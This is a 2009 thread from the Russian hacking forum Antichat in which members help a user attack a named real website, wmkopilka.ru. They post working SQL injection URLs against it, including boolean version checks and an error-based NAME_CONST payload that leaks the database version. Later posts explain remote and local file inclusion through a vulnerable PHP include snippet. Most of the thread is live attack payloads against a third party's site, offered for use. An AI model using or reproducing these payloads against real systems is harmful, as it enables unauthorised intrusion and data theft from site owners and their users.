Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.11.2009, 16:41
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
Всем привет.
Xttp://www.wmkopilka.ru/coinbox.php?5240'
Кто что скажет? Два дня пытался крутить результата ноль
|
|
|
09.11.2009, 17:17
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Есть =)
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring((select/**/version()),1,1)=5/**/and/**/'1'='1
|
|
|
|
09.11.2009, 17:31
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 ElteRUS:
молоток, только можно и без select:
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1
|
|
|
|
09.11.2009, 17:43
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Pashkela
2 ElteRUS:
молоток, только можно и без select:
А можно вообще без substring, т.к. мускуль конвертирует типы данных.
Код:
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/version()=5/**/and/**/'1'='1
|
|
|
|
09.11.2009, 17:49
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
А можно и вывод сделать:
Код:
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name '5.0.67'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
Для кого человек старался? Почему не используете? 
__________________
включи голову
|
|
|
|
09.11.2009, 19:18
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
<?php
if (isset($_GET['q'])){
include("http://www.site.ru/?q=".$_GET['q'].".php");
}
?>
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?
Я вот хотел узнать к чему можно "подцепиться"  ) чтоб дальше узнать что делать.
Нет так сказать "универсальные" трюки для уловки SQL инекци ?
|
|
|
|
09.11.2009, 19:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от l1ght
sorry за оффтоп, кто короче?
http://wmkopilka.ru/coinbox.php?5'*version()/'5 Умно 5*5/5
|
|
|
|
09.11.2009, 19:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от mailbrush
Умно 5*5/5 /add аа блин, первый вариант тоже правильный), напрасная параноя с 6/5
все таки лучше так
http://wmkopilka.ru/coinbox.php?5240'+version()-'5 = http://wmkopilka.ru/coinbox.php?5240
Последний раз редактировалось l1ght; 09.11.2009 в 20:15..
|
|
|
|
09.11.2009, 19:38
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от B1t.exe
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?
Я вот хотел узнать к чему можно "подцепиться" ) чтоб дальше узнать что делать.
Нет так сказать "универсальные" трюки для уловки SQL инекци ? Какой SQL inj ?
Здесь базой данных то и не пахнет.
У тебя есть инклайд.
PHP код:
<?php
if (isset($_GET['q'])){
include($_GET['q'].".php");
}
?>
ты получишь RFI (Remote File Include):
site.com/script.php?q=http://site.net/file
рузумееться при сообтетствующей конфигурации WEB сервера.
А именно - для RFI должен быть включен allow_url_include в php.ini
Так же можно юзать как и лфи.
Советую почитать статью задохлика:
http://forum.antichat.ru/thread23501.html
Последний раз редактировалось Ins3t; 09.11.2009 в 19:42..
|
|
|
|
09.11.2009, 22:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
на днях первый раз в жизни столкнулся со следующим адресом:
www.site.com/default.php?show=100 +and+ascii(lower(substring(version(),1,1)))=51
Можете объяснить или дать что либо почитать, что, в какой версии и вообще где применяется
......+and+ascii(lower(substring(version(),1,1)))= 51
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
